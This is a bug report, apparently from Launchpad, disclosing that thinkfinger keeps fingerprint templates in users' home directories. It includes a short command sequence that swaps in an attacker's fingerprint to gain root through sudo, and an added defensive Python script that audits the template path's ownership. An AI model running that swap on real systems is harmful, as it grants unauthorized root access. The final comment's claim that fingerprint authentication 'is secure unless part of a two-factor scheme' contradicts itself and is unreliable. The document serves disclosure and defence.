Fingerprints stored in unsafe location
Bug #235297 reported by Tom Jaeger
Affects | Status | Importance | Assigned to | Milestone |
---|---|---|---|---|
thinkfinger (Ubuntu) | Confirmed | Undecided | Unassigned | |
Bug Description
Fingerprints are stored in a user's home directory. This leads to a privilege escalation bug that is trivial to exploit given access to a user account and the fingerprint reader:
mv .thinkfinger.bir .thinkfinger.bir~ # save fingerprint
tf-tool --acquire # enroll the attacker's fingerprint
sudo ... # become root with the newly registered fingerprint
mv .thinkfinger.bir~ .thinkfinger.bir # restore original fingerprint
You might argue that giving an untrusted individual access to a user account is a problem in and of itself, but this is making it a little too easy to become root.
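A defensive check for the condition this report describes, as an added example that is not part of the original report or of thinkfinger's code: it walks from the template file up to `/` and lists every path component that an account outside a trusted set owns or can write. The function name and the default trusted UID set are assumptions; only the `.thinkfinger.bir` file name comes from the report, and the file contents are constructed.

```python
import os
import stat
import tempfile


def audit_template_path(path, trusted_uids=(0,)):
    """Return (component, reason) pairs for each component of `path` that an
    account outside `trusted_uids` owns or that is group/other writable."""
    findings = []
    current = os.path.realpath(path)  # resolve symlinks before walking upward
    while True:
        st = os.lstat(current)
        mode = stat.S_IMODE(st.st_mode)
        if st.st_uid not in trusted_uids:
            # The owner can rewrite the file, or rename entries in the directory.
            findings.append((current, f"owned by uid {st.st_uid}"))
        writable = mode & (stat.S_IWGRP | stat.S_IWOTH)
        # A sticky directory (such as /tmp) only lets an entry's owner rename it,
        # and that owner is checked separately on the child component.
        sticky = stat.S_ISDIR(st.st_mode) and (st.st_mode & stat.S_ISVTX)
        if writable and not sticky:
            findings.append((current, f"group/other writable (mode {mode:04o})"))
        parent = os.path.dirname(current)
        if parent == current:  # reached the filesystem root
            break
        current = parent
    return findings


if __name__ == "__main__":
    # Constructed stand-in for a home directory holding the template file.
    home = tempfile.mkdtemp()
    template = os.path.join(home, ".thinkfinger.bir")
    with open(template, "wb") as fh:
        fh.write(b"constructed placeholder, not a real template")
    for component, reason in audit_template_path(template):
        print(f"{component}: {reason}")
```

Run as an unprivileged user, the demo reports both the template and its directory as owned by that user, which is the precondition for the swap shown in the report.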
Changed in thinkfinger: status: New → Confirmed
Fingerprint authentication is secure unless part of a two-factor scheme. Even without compromising an admin user's account, there's often enough information on say a laptop screen to break a fingerprint auth.